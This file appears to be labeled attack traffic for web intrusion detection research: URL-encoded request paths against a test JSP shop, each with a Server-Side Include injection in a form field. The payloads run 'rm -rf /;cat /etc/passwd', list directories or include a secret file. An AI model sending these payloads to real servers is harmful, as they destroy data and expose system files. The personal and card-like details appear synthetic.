/tienda1/publico/autenticar.jsp?modo=entrar&login=ovas%3C%21--%23include+file%3D%22archivo_secreto%22+--%3E&pwd=ric8Me6te&remember=on&B1=Entrar
/tienda1/publico/anadir.jsp?id=3&nombre=Queso+Manchego&precio=39&cantidad=67&B1=%3C%21--%23EXEC+cmd%3D%22ls+%2F%22--%3E
/tienda1/publico/autenticar.jsp?modo=entrar&login=toole&pwd=e9ternecer&remember=on&B1=%3C%21--%23exec+cmd%3D%22rm+-rf+%2F%3Bcat+%2Fetc%2Fpasswd%22+--%3E
/tienda1/publico/vaciar.jsp?B2=Vaciar+carrito%3C%21--%23exec+cmd%3D%22rm+-rf+%2F%3Bcat+%2Fetc%2Fpasswd%22+--%3E
/tienda1/publico/pagar.jsp?modo=insertar&precio=%22%3E%3C%21--%23EXEC+cmd%3D%22dir+%22--%3E%3C&B1=Confirmar
/tienda1/miembros/editar.jsp?modo=registro&login=michial3&password=83o3i7a374&nombre=%3C%21--%23exec+cmd%3D%22rm+-rf+%2F%3Bcat+%2Fetc%2Fpasswd%22+--%3E&apellidos=D%27Paoli+Garros&email=bessell%40ttivoni.is&dni=32124292P&direccion=C%2F+Montevideo+193%2C+&ciudad=Rupi%E0&cp=39572&provincia=Burgos&ntc=8086742983774365&B1=Registrar
/tienda1/miembros/editar.jsp?modo=registro&login=tebinka&password=bICoQu%CDN&nombre=Beshara&apellidos=Medio+Bullones&email=miravalles_kaa%40castigadas.tm&dni=%3C%21--%23exec+cmd%3D%22rm+-rf+%2F%3Bcat+%2Fetc%2Fpasswd%22+--%3E&direccion=Pl.+Durcal%2C+141%2C+&ciudad=Camarenilla&cp=21240&provincia=Huelva&ntc=5144167134274894&B1=Registrar
/tienda1/publico/anadir.jsp?id=%3C%21--%23include+file%3D%22archivo_secreto%22+--%3E&nombre=Queso+Manchego&precio=85&cantidad=63&B1=A%F1adir+al+carrito
/tienda1/miembros/editar.jsp?modo=registro&login=moeschet&password=FAstiD%3FIoso&nombre=VahidReza&apellidos=Toral+Pine&email=uray%40hosterialasmajadillas.pt&dni=79928493C&direccion=Dido+162%2C+&ciudad=Aldeanueva+de+Ebro&cp=50001%22%3E%3C%21--%23EXEC+cmd%3D%22dir+%22--%3E%3C&provincia=Madrid&ntc=6010532265403807&B1=Registrar
/tienda1/miembros/editar.jsp?modo=registro&login=wonuk&password=pulverizador%22%3E%3C%21--%23EXEC+cmd%3D%22dir+%22--%3E%3C&nombre=Mahoma&apellidos=Alorda+Goicoechea&email=fenn%40ticketsport.nu&dni=08512419G&direccion=Calle+Amanecer+105+&ciudad=Fuente+de+San+Esteban%2C+La&cp=16611&provincia=Huelva&ntc=9776865441504888&B1=Registrar
/tienda1/publico/caracteristicas.jsp?id=1%3C%21--%23exec+cmd%3D%22rm+-rf+%2F%3Bcat+%2Fetc%2Fpasswd%22+--%3E
/tienda1/miembros/editar.jsp?modo=registro&login=nyberg&password=predicha&nombre=Carmina&apellidos=Serarols+Ginesta%3C%21--%23include+file%3D%22archivo_secreto%22+--%3E&email=redford2%40enlanzarote.com.cz&dni=80243620R&direccion=Zumel+S%2FN%2C+&ciudad=Mas+de+Barberans&cp=05420&provincia=Zamora&ntc=5782200649154235&B1=Registrar
/tienda1/publico/registro.jsp?modo=registro&login=csua&password=mu%E9&nombre=Giselle&apellidos=Gar%F3fano+Leguizam%F3n&email=sayo%40cbgerindote.pt&dni=40660740Y&direccion=C%2F+Albert+Einstein+118+&ciudad=Cendejas+de+Enmedio&cp=33520&provincia=%3C%21--%23EXEC+cmd%3D%22ls+%2F%22--%3E&ntc=4214809525884531&B1=Registrar
/tienda1/publico/anadir.jsp?id=3&nombre=Vino+Rioja&precio=85&cantidad=80&B1=%22%3E%3C%21--%23EXEC+cmd%3D%22dir+%22--%3E%3C
/tienda1/publico/vaciar.jsp?B2=%3C%21--%23include+file%3D%22archivo_secreto%22+--%3E
/tienda1/publico/registro.jsp?modo=registro&login=helma&password=92H126nA&nombre=Francisco+de+Borja&apellidos=Sofra+Galcer%E1n&email=mizell%40x2.com.vu&dni=61328646C&direccion=Parc+De+La+Budellera%2C+3%2C+4-B&ciudad=Outes&cp=43421&provincia=Huesca&ntc=0417370510264127&B1=Registrar%3C%21--%23include+file%3D%22archivo_secreto%22+--%3E
/tienda1/publico/anadir.jsp?id=%3C%21--%23include+file%3D%22archivo_secreto%22+--%3E&nombre=Jam%F3n+Ib%E9rico&precio=85&cantidad=32&B1=A%F1adir+al+carrito
/tienda1/publico/autenticar.jsp?modo=entrar&login=maijala&pwd=%3C%21--%23include+file%3D%22archivo_secreto%22+--%3E&remember=on&B1=Entrar
/tienda1/publico/registro.jsp?modo=registro&login=horng&password=Tablaz%F3N&nombre=Ta%EDs&apellidos=Salguero+Peri&email=hyland%40magritte.pm&dni=64709043S&direccion=Dieciocho+De+Julio%2C+83+&ciudad=%3C%21--%23EXEC+cmd%3D%22ls+%2F%22--%3E&cp=11139&provincia=Valencia&ntc=9930911410161523&B1=Registrar
/tienda1/publico/pagar.jsp?modo=insertar&precio=%3C%21--%23EXEC+cmd%3D%22ls+%2F%22--%3E&B1=Pasar+por+caja
/tienda1/publico/vaciar.jsp?B2=Vaciar+carrito%3C%21--%23include+file%3D%22archivo_secreto%22+--%3E
/tienda1/publico/registro.jsp?modo=registro&login=yu-wei&password=MaScadurA&nombre=Lih%E9n&apellidos=Ce%F1al&email=mostel%40hipernavarra.mc&dni=49437237W&direccion=Paseo+Escuelas+Pias%2C+119%2C+&ciudad=Busto%2C+El&cp=16779&provincia=Toledo&ntc=6995607131571243%3C%21--%23include+file%3D%22archivo_secreto%22+--%3E&B1=Registrar
/tienda1/publico/vaciar.jsp?B2=Vaciar+carrito%22%3E%3C%21--%23EXEC+cmd%3D%22dir+%22--%3E%3C
/tienda1/publico/anadir.jsp?id=3&nombre=Queso+Manchego&precio=39&cantidad=84%22%3E%3C%21--%23EXEC+cmd%3D%22dir+%22--%3E%3C&B1=A%F1adir+al+carrito
/tienda1/miembros/editar.jsp?modo=registro&login=winnie&password=1ArZ5ElA&nombre=Pomponio&apellidos=Aboitiz+Monestel&email=mcnaughton%40queinvento.gg%3C%21--%23include+file%3D%22archivo_secreto%22+--%3E&dni=86852947W&direccion=Calle+Gerardo+Rueda%2C+68%2C+3%3FC&ciudad=Foradada&cp=43411&provincia=Badajoz&ntc=4587587495208642&B1=Registrar
/tienda1/publico/pagar.jsp?modo=insertar&precio=7686&B1=Pasar+por+caja%3C%21--%23include+file%3D%22archivo_secreto%22+--%3E
/tienda1/miembros/editar.jsp?modo=registro%3C%21--%23include+file%3D%22archivo_secreto%22+--%3E&login=jessalyn&password=tra8ucaire&nombre=Ventura&apellidos=Codinacs+Bellver&email=nace%409horas.mg&dni=55526590J&direccion=C%2F+Zumalacarregui+4+11%3FH&ciudad=Ar%E9valo+de+la+Sierra&cp=40541&provincia=Segovia&ntc=2481775887753084&B1=Registrar
/tienda1/publico/pagar.jsp?modo=insertar&precio=6801&B1=%22%3E%3C%21--%23EXEC+cmd%3D%22dir+%22--%3E%3C
/tienda1/publico/autenticar.jsp?modo=entrar&login=lyliston&pwd=%22%3E%3C%21--%23EXEC+cmd%3D%22dir+%22--%3E%3C&remember=off&B1=Entrar
/tienda1/publico/pagar.jsp?modo=%3C%21--%23exec+cmd%3D%22rm+-rf+%2F%3Bcat+%2Fetc%2Fpasswd%22+--%3E&precio=8166&B1=Confirmar
/tienda1/publico/anadir.jsp?id=1&nombre=%22%3E%3C%21--%23EXEC+cmd%3D%22dir+%22--%3E%3C&precio=100&cantidad=15&B1=A%F1adir+al+carrito
/tienda1/publico/pagar.jsp?modo=insertar&precio=6525&B1=Pasar+por+caja%3C%21--%23EXEC+cmd%3D%22ls+%2F%22--%3E
/tienda1/publico/vaciar.jsp?B2=Vaciar+carrito%3C%21--%23EXEC+cmd%3D%22ls+%2F%22--%3E
/tienda1/publico/anadir.jsp?id=1&nombre=Queso+Manchego&precio=85&cantidad=22%3C%21--%23exec+cmd%3D%22rm+-rf+%2F%3Bcat+%2Fetc%2Fpasswd%22+--%3E&B1=A%F1adir+al+carrito
/tienda1/publico/anadir.jsp?id=%3C%21--%23include+file%3D%22archivo_secreto%22+--%3E&nombre=Queso+Manchego&precio=85&cantidad=90&B1=A%F1adir+al+carrito
/tienda1/publico/pagar.jsp?modo=insertar&precio=4975&B1=%3C%21--%23include+file%3D%22archivo_secreto%22+--%3E
/tienda1/miembros/editar.jsp?modo=registro&login=morelli&password=%3C%21--%23include+file%3D%22archivo_secreto%22+--%3E&nombre=Erno&apellidos=Maqueira+Somohano&email=polivitskiui_manzarek2%40candidaturaolle-futuronotarial.edu&dni=35265294S&direccion=Pl.+Augusto+Conte+Lacave%2C+86+&ciudad=Torre-serona&cp=09691&provincia=Granada&ntc=9613911673580851&B1=Registrar
/tienda1/publico/anadir.jsp?id=%3C%21--%23EXEC+cmd%3D%22ls+%2F%22--%3E&nombre=Jam%F3n+Ib%E9rico&precio=39&cantidad=52&B1=A%F1adir+al+carrito
/tienda1/publico/autenticar.jsp?modo=entrar&login=hanneke%3C%21--%23EXEC+cmd%3D%22ls+%2F%22--%3E&pwd=dESHILadIZ&remember=off&B1=Entrar
/tienda1/publico/autenticar.jsp?modo=entrar&login=wylie&pwd=%22%3E%3C%21--%23EXEC+cmd%3D%22dir+%22--%3E%3C&remember=off&B1=Entrar
/tienda1/publico/registro.jsp?modo=registro&login=eshelman&password=fiLosOFAR&nombre=Zarif&apellidos=Torrabadella%3C%21--%23exec+cmd%3D%22rm+-rf+%2F%3Bcat+%2Fetc%2Fpasswd%22+--%3E&email=cavender_jacob%409horas.uk&dni=73992011E&direccion=C%2F+Marbella+103+8A&ciudad=Artazu&cp=29532&provincia=Badajoz&ntc=1546173656033041&B1=Registrar
/tienda1/publico/pagar.jsp?modo=insertar&precio=622%3C%21--%23exec+cmd%3D%22rm+-rf+%2F%3Bcat+%2Fetc%2Fpasswd%22+--%3E&B1=Pasar+por+caja
/tienda1/publico/registro.jsp?modo=%3C%21--%23EXEC+cmd%3D%22ls+%2F%22--%3E&login=laz&password=d4S%ED8AB8&nombre=Caledonia&apellidos=Antonioli+Blanc&email=rao%40ajuntamentdebarcelona20.vu&dni=99892750R&direccion=C%2F+Puerto+De+La+Luz+129%2C+&ciudad=Valverde+del+Majano&cp=34126&provincia=Baleares+%28Illes%29&ntc=4228631856170637&B1=Registrar
/tienda1/publico/entrar.jsp?errorMsg=%3C%21--%23EXEC+cmd%3D%22ls+%2F%22--%3E
/tienda1/publico/registro.jsp?modo=registro&login=jakabffy&password=33aRr179&nombre=VahidReza&apellidos=Curell+Lagares&email=moura%40chicasdiabolo.iq&dni=75130756Z&direccion=Urbanizacion+Montesion%2C+3+&ciudad=Molinaseca&cp=45180&provincia=%3C%21--%23EXEC+cmd%3D%22ls+%2F%22--%3E&ntc=2571648203429012&B1=Registrar
/tienda1/publico/registro.jsp?modo=registro&login=%3C%21--%23EXEC+cmd%3D%22ls+%2F%22--%3E&password=3749s63a&nombre=Avito&apellidos=Zalarich+Llufriu&email=saul%40expertmagnet.np&dni=14335839P&direccion=C%2F+Barranquet+130+&ciudad=Calzada+de+los+Molinos&cp=50470&provincia=A+Coru%F1a&ntc=9270239658811052&B1=Registrar
/tienda1/miembros/editar.jsp?modo=registro&login=%3C%21--%23exec+cmd%3D%22rm+-rf+%2F%3Bcat+%2Fetc%2Fpasswd%22+--%3E&password=l53%2420a5i5&nombre=Epuyen&apellidos=Monz%F3+Turu&email=treacher-johnson%40pinturasultravioleta.mk&dni=93658215F&direccion=Urbanizacion+Montesion%2C+3+&ciudad=Aoiz%2FAgoitz&cp=39640&provincia=Salamanca&ntc=1895469011099422&B1=Registrar
/tienda1/publico/anadir.jsp?id=3%3C%21--%23exec+cmd%3D%22rm+-rf+%2F%3Bcat+%2Fetc%2Fpasswd%22+--%3E&nombre=Queso+Manchego&precio=100&cantidad=15&B1=A%F1adir+al+carrito
/tienda1/miembros/editar.jsp?modo=%3C%21--%23include+file%3D%22archivo_secreto%22+--%3E&login=knobloch6&password=B5i230a&nombre=Nahuel&apellidos=Arbona+Yaz%E1n&email=bruck7%40introito.cg&dni=85294407B&direccion=Pl.+La+Se%F1oria%2C+192+12E&ciudad=Valverde+del+Camino&cp=33746&provincia=Lleida&ntc=7752606383220025&B1=Registrar
/tienda1/miembros/editar.jsp?modo=registro&login=butcher&password=PanOso&nombre=Adelqui&apellidos=Riu+Riutort&email=wiren%40acch.mk&dni=92652474X&direccion=Carretera+Industrial%2C+60+&ciudad=Elduain&cp=26250&provincia=%C1vila%3C%21--%23exec+cmd%3D%22rm+-rf+%2F%3Bcat+%2Fetc%2Fpasswd%22+--%3E&ntc=7730205532508885&B1=Registrar
/tienda1/publico/registro.jsp?modo=registro&login=alyosha&password=91pol277e30&nombre=Emanuel&apellidos=Barriuso+Arvizu&email=ecoffey%40hostrofessional.com.dd&dni=05207916A&direccion=Ciudad+De+Ceuta%2C+31%2C+9-B&ciudad=Salda%F1a&cp=%3C%21--%23EXEC+cmd%3D%22ls+%2F%22--%3E&provincia=C%E1ceres&ntc=9078165703256769&B1=Registrar
/tienda1/publico/anadir.jsp?id=2&nombre=%22%3E%3C%21--%23EXEC+cmd%3D%22dir+%22--%3E%3C&precio=39&cantidad=34&B1=A%F1adir+al+carrito
/tienda1/publico/pagar.jsp?modo=insertar%3C%21--%23exec+cmd%3D%22rm+-rf+%2F%3Bcat+%2Fetc%2Fpasswd%22+--%3E&precio=5191&B1=Confirmar
/tienda1/publico/caracteristicas.jsp?id=1%3C%21--%23EXEC+cmd%3D%22ls+%2F%22--%3E
/tienda1/publico/anadir.jsp?id=1&nombre=Jam%F3n+Ib%E9rico&precio=85%3C%21--%23include+file%3D%22archivo_secreto%22+--%3E&cantidad=66&B1=A%F1adir+al+carrito
/tienda1/publico/anadir.jsp?id=3&nombre=Vino+Rioja&precio=%22%3E%3C%21--%23EXEC+cmd%3D%22dir+%22--%3E%3C&cantidad=58&B1=A%F1adir+al+carrito
/tienda1/publico/entrar.jsp?errorMsg=Credenciales+incorrectas%3C%21--%23EXEC+cmd%3D%22ls+%2F%22--%3E
/tienda1/publico/registro.jsp?modo=%3C%21--%23include+file%3D%22archivo_secreto%22+--%3E&login=boschin&password=3189p6zada&nombre=Amadis&apellidos=Funes+Port%E9s&email=gracie%40triplectextil.me&dni=81791661G&direccion=Carrer+Pica+D%27estats+113%2C+1%3FD&ciudad=Pedrosillo+de+los+Aires&cp=03345&provincia=Guadalajara&ntc=1272948221132397&B1=Registrar
/tienda1/publico/pagar.jsp?modo=insertar%22%3E%3C%21--%23EXEC+cmd%3D%22dir+%22--%3E%3C&precio=8962&B1=Confirmar
/tienda1/publico/registro.jsp?modo=registro&login=thatcher7&password=CeSt%D3N&nombre=%22%3E%3C%21--%23EXEC+cmd%3D%22dir+%22--%3E%3C&apellidos=Narva&email=funchess%40lamarsrl.gy&dni=94853539K&direccion=Luis+Doreste+Silva+S%2FN+6%3FD&ciudad=Salares&cp=15910&provincia=%C1vila&ntc=5040261965189529&B1=Registrar
/tienda1/publico/registro.jsp?modo=registro&login=emilien&password=pArox%EDtona&nombre=Sami&apellidos=Aller+May%E1n&email=binns%40maxitienda.gs&dni=%3C%21--%23exec+cmd%3D%22rm+-rf+%2F%3Bcat+%2Fetc%2Fpasswd%22+--%3E&direccion=Calle+El+Tiburon+197%2C+12%3FC&ciudad=Escarabajosa+de+Cabezas&cp=25135&provincia=Las+Palmas&ntc=2647099047093404&B1=Registrar
/tienda1/miembros/editar.jsp?modo=registro&login=etienne%22%3E%3C%21--%23EXEC+cmd%3D%22dir+%22--%3E%3C&password=ahoga2iz8&nombre=Pastora&apellidos=Aleu+Alcaide&email=gulager-balsan6%40978.dm&dni=44544869X&direccion=Giuseppe+Micael%2C+174+8-H&ciudad=Valdefuentes+del+P%E1ramo&cp=06300&provincia=Ciudad+Real&ntc=5699405800944222&B1=Registrar
/tienda1/publico/entrar.jsp?errorMsg=%3C%21--%23include+file%3D%22archivo_secreto%22+--%3E
/tienda1/publico/pagar.jsp?modo=insertar&precio=7436&B1=%3C%21--%23exec+cmd%3D%22rm+-rf+%2F%3Bcat+%2Fetc%2Fpasswd%22+--%3E
/tienda1/publico/anadir.jsp?id=3&nombre=Queso+Manchego&precio=39&cantidad=28&B1=%3C%21--%23exec+cmd%3D%22rm+-rf+%2F%3Bcat+%2Fetc%2Fpasswd%22+--%3E
/tienda1/publico/anadir.jsp?id=1&nombre=Vino+Rioja&precio=85&cantidad=63%22%3E%3C%21--%23EXEC+cmd%3D%22dir+%22--%3E%3C&B1=A%F1adir+al+carrito
/tienda1/publico/anadir.jsp?id=2&nombre=Queso+Manchego&precio=%3C%21--%23EXEC+cmd%3D%22ls+%2F%22--%3E&cantidad=86&B1=A%F1adir+al+carrito
/tienda1/publico/vaciar.jsp?B2=%3C%21--%23exec+cmd%3D%22rm+-rf+%2F%3Bcat+%2Fetc%2Fpasswd%22+--%3E
/tienda1/publico/anadir.jsp?id=%3C%21--%23include+file%3D%22archivo_secreto%22+--%3E&nombre=Vino+Rioja&precio=85&cantidad=63&B1=A%F1adir+al+carrito
/tienda1/miembros/editar.jsp?modo=registro&login=jocelyn&password=v821ri8&nombre=Raven&apellidos=Rambla+Jalencas%3C%21--%23exec+cmd%3D%22rm+-rf+%2F%3Bcat+%2Fetc%2Fpasswd%22+--%3E&email=bourdette%40sexl.ro&dni=66518253E&direccion=C%2F+Fuerte+Isabel+Ii%2C+78+3%3FC&ciudad=Sando&cp=50088&provincia=Girona&ntc=0028019013829640&B1=Registrar
/tienda1/publico/registro.jsp?modo=registro%22%3E%3C%21--%23EXEC+cmd%3D%22dir+%22--%3E%3C&login=carmelin&password=cI9CuE7t6%F1AL&nombre=Yago&apellidos=Morgadas&email=mondini%40goscan.io&dni=81743896X&direccion=Pantano+De+La+Sotonera%2C+145+&ciudad=Ahigal+de+los+Aceiteros&cp=26526&provincia=Tarragona&ntc=0742459903329031&B1=Registrar
/tienda1/miembros/editar.jsp?modo=registro&login=kassissi&password=chamizo&nombre=Reese&apellidos=Rib%E9+Pinart&email=shale-rozsival1%40ssextremadura.sm&dni=%3C%21--%23exec+cmd%3D%22rm+-rf+%2F%3Bcat+%2Fetc%2Fpasswd%22+--%3E&direccion=C%2F+Juan+De+Zoyas+50%2C+1%3FH&ciudad=Villafranca&cp=36450&provincia=Teruel&ntc=5175598912871065&B1=Registrar
/tienda1/publico/autenticar.jsp?modo=entrar&login=arro&pwd=CarMinAR%3C%21--%23include+file%3D%22archivo_secreto%22+--%3E&remember=on&B1=Entrar
/tienda1/miembros/editar.jsp?modo=registro&login=amar&password=encallecer&nombre=Celedonio&apellidos=Compres+Manau&email=danielson%40bloodline.mc&dni=45415076N&direccion=Valladolid%2C+99+7A%22%3E%3C%21--%23EXEC+cmd%3D%22dir+%22--%3E%3C&ciudad=Borges+del+Camp%2C+Les&cp=50343&provincia=Baleares+%28Illes%29&ntc=1817134739036015&B1=Registrar
/tienda1/publico/anadir.jsp?id=2&nombre=Queso+Manchego&precio=85&cantidad=86%22%3E%3C%21--%23EXEC+cmd%3D%22dir+%22--%3E%3C&B1=A%F1adir+al+carrito
/tienda1/publico/caracteristicas.jsp?id=1%3C%21--%23include+file%3D%22archivo_secreto%22+--%3E
/tienda1/publico/registro.jsp?modo=registro&login=zander&password=arca%EDsta&nombre=Zain&apellidos=Espriella+Morcos&email=skala%40lamarsrl.la&dni=28264646S&direccion=Nardo%2C+106%2C+7-H&ciudad=%3C%21--%23include+file%3D%22archivo_secreto%22+--%3E&cp=46315&provincia=Alicante&ntc=5436324330428646&B1=Registrar
/tienda1/miembros/editar.jsp?modo=registro&login=hammad&password=7ON4CHUEla&nombre=%3C%21--%23include+file%3D%22archivo_secreto%22+--%3E&apellidos=Pollini+Llobet&email=suedo%40xavipetit.kz&dni=09876466J&direccion=Calle+Violeta+118%2C+&ciudad=San+Sadurni%F1o&cp=21600&provincia=Girona&ntc=2717952590420573&B1=Registrar
/tienda1/publico/pagar.jsp?modo=insertar&precio=7730&B1=%22%3E%3C%21--%23EXEC+cmd%3D%22dir+%22--%3E%3C
/tienda1/publico/pagar.jsp?modo=insertar&precio=3858&B1=Pasar+por+caja%3C%21--%23exec+cmd%3D%22rm+-rf+%2F%3Bcat+%2Fetc%2Fpasswd%22+--%3E
/tienda1/publico/autenticar.jsp?modo=entrar&login=satta&pwd=es699601r&remember=on%3C%21--%23exec+cmd%3D%22rm+-rf+%2F%3Bcat+%2Fetc%2Fpasswd%22+--%3E&B1=Entrar
/tienda1/publico/registro.jsp?modo=registro&login=sainsbur&password=aUsTridA%3C%21--%23EXEC+cmd%3D%22ls+%2F%22--%3E&nombre=Deifilia&apellidos=Benedetti+Lozana&email=haddrick_cleary%40esposa.com.mobi&dni=80061275T&direccion=Plza.+Garcia+Alvarez+De+Albornoz%2C+146+&ciudad=Alc%E1zares%2C+Los&cp=41540&provincia=Tarragona&ntc=0932460116452279&B1=Registrar
/tienda1/publico/autenticar.jsp?modo=entrar&login=lutz&pwd=OpimA&remember=off%22%3E%3C%21--%23EXEC+cmd%3D%22dir+%22--%3E%3C&B1=Entrar
/tienda1/miembros/editar.jsp?modo=registro&login=boyajian&password=sERviola&nombre=Rut&apellidos=Xim%E9nez+Alamo&email=gleaves4%40mauroman.ml&dni=93721450S&direccion=Escritor+Gomez+De+Rivera%2C+191+&ciudad=Legutiano&cp=09119&provincia=C%E1ceres&ntc=9325877908605374&B1=Registrar%3C%21--%23include+file%3D%22archivo_secreto%22+--%3E
/tienda1/publico/caracteristicas.jsp?id=%3C%21--%23include+file%3D%22archivo_secreto%22+--%3E
/tienda1/publico/anadir.jsp?id=3%3C%21--%23exec+cmd%3D%22rm+-rf+%2F%3Bcat+%2Fetc%2Fpasswd%22+--%3E&nombre=Vino+Rioja&precio=100&cantidad=56&B1=A%F1adir+al+carrito
/tienda1/publico/anadir.jsp?id=3&nombre=Queso+Manchego%3C%21--%23include+file%3D%22archivo_secreto%22+--%3E&precio=39&cantidad=9&B1=A%F1adir+al+carrito
/tienda1/publico/caracteristicas.jsp?id=%22%3E%3C%21--%23EXEC+cmd%3D%22dir+%22--%3E%3C
/tienda1/publico/registro.jsp?modo=registro&login=tat7&password=p0on57cia008nto&nombre=Camelia&apellidos=Zurita+Santander&email=diessl-claver%40tradedeficit.mz&dni=59059811C&direccion=Artes%2C+S%2FN+&ciudad=Escobar+de+Polendos&cp=18518&provincia=Burgos&ntc=2636619315022095&B1=Registrar%22%3E%3C%21--%23EXEC+cmd%3D%22dir+%22--%3E%3C
/tienda1/publico/caracteristicas.jsp?id=1%22%3E%3C%21--%23EXEC+cmd%3D%22dir+%22--%3E%3C
/tienda1/publico/entrar.jsp?errorMsg=Credenciales+incorrectas%3C%21--%23exec+cmd%3D%22rm+-rf+%2F%3Bcat+%2Fetc%2Fpasswd%22+--%3E
/tienda1/publico/caracteristicas.jsp?id=2%3C%21--%23exec+cmd%3D%22rm+-rf+%2F%3Bcat+%2Fetc%2Fpasswd%22+--%3E
/tienda1/publico/anadir.jsp?id=1&nombre=%3C%21--%23exec+cmd%3D%22rm+-rf+%2F%3Bcat+%2Fetc%2Fpasswd%22+--%3E&precio=85&cantidad=15&B1=A%F1adir+al+carrito
/tienda1/miembros/editar.jsp?modo=registro&login=crozier&password=aborrecimiento&nombre=Ricardina&apellidos=Burch+Echaniz&email=hyer_longdon0%40artforall.mc&dni=62804007T%22%3E%3C%21--%23EXEC+cmd%3D%22dir+%22--%3E%3C&direccion=Plza.+Troyano+Salaverry%2C+42%2C+&ciudad=Ch%F3var&cp=30500&provincia=Le%F3n&ntc=1229899553268508&B1=Registrar
/tienda1/publico/autenticar.jsp?modo=entrar&login=espinosa&pwd=candado&remember=%3C%21--%23EXEC+cmd%3D%22ls+%2F%22--%3E&B1=Entrar
/tienda1/miembros/editar.jsp?modo=registro&login=lieure&password=rEbatible&nombre=Tarciano&apellidos=Villalta+Tapasco&email=touret%40artesania.org.cv&dni=42708654T&direccion=Calle+Eduardo+Blanco+Amor%2C+120%2C+1%3FB&ciudad=Sopeira&cp=12230&provincia=Guadalajara&ntc=7642131917731646%3C%21--%23EXEC+cmd%3D%22ls+%2F%22--%3E&B1=Registrar
/tienda1/publico/caracteristicas.jsp?id=%3C%21--%23exec+cmd%3D%22rm+-rf+%2F%3Bcat+%2Fetc%2Fpasswd%22+--%3E
/tienda1/publico/autenticar.jsp?modo=entrar&login=mcnair&pwd=81cob6r&remember=off%3C%21--%23exec+cmd%3D%22rm+-rf+%2F%3Bcat+%2Fetc%2Fpasswd%22+--%3E&B1=Entrar
/tienda1/publico/entrar.jsp?errorMsg=Credenciales+incorrectas%3C%21--%23include+file%3D%22archivo_secreto%22+--%3E
/tienda1/miembros/editar.jsp?modo=registro&login=kingston&password=tRaSPlAnTe&nombre=Johana&apellidos=%22%3E%3C%21--%23EXEC+cmd%3D%22dir+%22--%3E%3C&email=lobe-cary%40videoerotic.mh&dni=86807165J&direccion=Calle+Olof+Palme+S%2FN%2C+&ciudad=Navezuelas&cp=44330&provincia=Navarra&ntc=4852910314860020&B1=Registrar
/tienda1/miembros/editar.jsp?modo=registro&login=delorme&password=terr%EDgena&nombre=Vladimir&apellidos=Basora+Bargall%F3&email=%3C%21--%23exec+cmd%3D%22rm+-rf+%2F%3Bcat+%2Fetc%2Fpasswd%22+--%3E&dni=40888726Q&direccion=Rio+Deva%2C+127%2C+13H&ciudad=Avinyonet+de+Puigvent%F3s&cp=25151&provincia=Salamanca&ntc=4881663630598066&B1=Registrar
/tienda1/publico/pagar.jsp?modo=insertar&precio=3748&B1=Pasar+por+caja%3C%21--%23include+file%3D%22archivo_secreto%22+--%3E
/tienda1/publico/anadir.jsp?id=2&nombre=Queso+Manchego&precio=100&cantidad=44&B1=%3C%21--%23EXEC+cmd%3D%22ls+%2F%22--%3E
/tienda1/publico/pagar.jsp?modo=insertar%3C%21--%23EXEC+cmd%3D%22ls+%2F%22--%3E&precio=3845&B1=Pasar+por+caja
/tienda1/publico/registro.jsp?modo=registro&login=swick&password=recalzar&nombre=Amiel&apellidos=Del+Blanco&email=ying-carridine%40audiosat.sy&dni=55739537A&direccion=Jose+Cadierno+186%2C+6F&ciudad=Nu%E9valos&cp=37621&provincia=Asturias%3C%21--%23include+file%3D%22archivo_secreto%22+--%3E&ntc=2320151892972616&B1=Registrar
/tienda1/publico/autenticar.jsp?modo=entrar&login=vivianne7%22%3E%3C%21--%23EXEC+cmd%3D%22dir+%22--%3E%3C&pwd=adu3%F3n&remember=on&B1=Entrar
/tienda1/publico/registro.jsp?modo=registro&login=essam&password=Cat*ER%E9tiCA&nombre=Dacil&apellidos=Matamala&email=sabin.prester%40sandrasummer.jm&dni=65185439N&direccion=%3C%21--%23exec+cmd%3D%22rm+-rf+%2F%3Bcat+%2Fetc%2Fpasswd%22+--%3E&ciudad=Gumiel+de+Mercado&cp=48140&provincia=Badajoz&ntc=9377201272032369&B1=Registrar
/tienda1/publico/autenticar.jsp?modo=%3C%21--%23EXEC+cmd%3D%22ls+%2F%22--%3E&login=crowder&pwd=6.en0e6at2da&remember=on&B1=Entrar
/tienda1/publico/anadir.jsp?id=1&nombre=Vino+Rioja&precio=85%22%3E%3C%21--%23EXEC+cmd%3D%22dir+%22--%3E%3C&cantidad=98&B1=A%F1adir+al+carrito
/tienda1/publico/entrar.jsp?errorMsg=Credenciales+incorrectas%22%3E%3C%21--%23EXEC+cmd%3D%22dir+%22--%3E%3C
/tienda1/publico/autenticar.jsp?modo=entrar&login=leppert&pwd=%3C%21--%23exec+cmd%3D%22rm+-rf+%2F%3Bcat+%2Fetc%2Fpasswd%22+--%3E&remember=on&B1=Entrar
/tienda1/publico/registro.jsp?modo=registro&login=hormoz&password=79Ari68&nombre=Tamar&apellidos=Unger&email=ferrandis%40ilusionarium.is&dni=27110453P&direccion=C%2F+Tampa%2C+34+&ciudad=Molares%2C+Los%22%3E%3C%21--%23EXEC+cmd%3D%22dir+%22--%3E%3C&cp=05410&provincia=Teruel&ntc=7701457023954310&B1=Registrar
/tienda1/publico/caracteristicas.jsp?id=2%3C%21--%23include+file%3D%22archivo_secreto%22+--%3E
/tienda1/publico/entrar.jsp?errorMsg=%3C%21--%23exec+cmd%3D%22rm+-rf+%2F%3Bcat+%2Fetc%2Fpasswd%22+--%3E
/tienda1/publico/registro.jsp?modo=registro&login=olivia&password=Pa-lTa&nombre=Clidanor&apellidos=Weffer+Vaamonde%22%3E%3C%21--%23EXEC+cmd%3D%22dir+%22--%3E%3C&email=dozier%40interanuncios.li&dni=58040403H&direccion=Vista+Alegre+90%2C+&ciudad=Copons&cp=43143&provincia=Valladolid&ntc=4437841608475479&B1=Registrar
/tienda1/publico/entrar.jsp?errorMsg=%22%3E%3C%21--%23EXEC+cmd%3D%22dir+%22--%3E%3C
/tienda1/miembros/editar.jsp?modo=registro&login=massinga&password=reSPALdar&nombre=Peregrino&apellidos=O%F1ate+Leguisamo&email=armida%40automovilesalhambra.pl&dni=65278169Y&direccion=C%2F+Canal%2C+25%2C+9%3FF&ciudad=Azkoitia%3C%21--%23EXEC+cmd%3D%22ls+%2F%22--%3E&cp=38911&provincia=Salamanca&ntc=4593527781788646&B1=Registrar
/tienda1/publico/vaciar.jsp?B2=%22%3E%3C%21--%23EXEC+cmd%3D%22dir+%22--%3E%3C
/tienda1/publico/pagar.jsp?modo=insertar&precio=3212%3C%21--%23EXEC+cmd%3D%22ls+%2F%22--%3E&B1=Pasar+por+caja
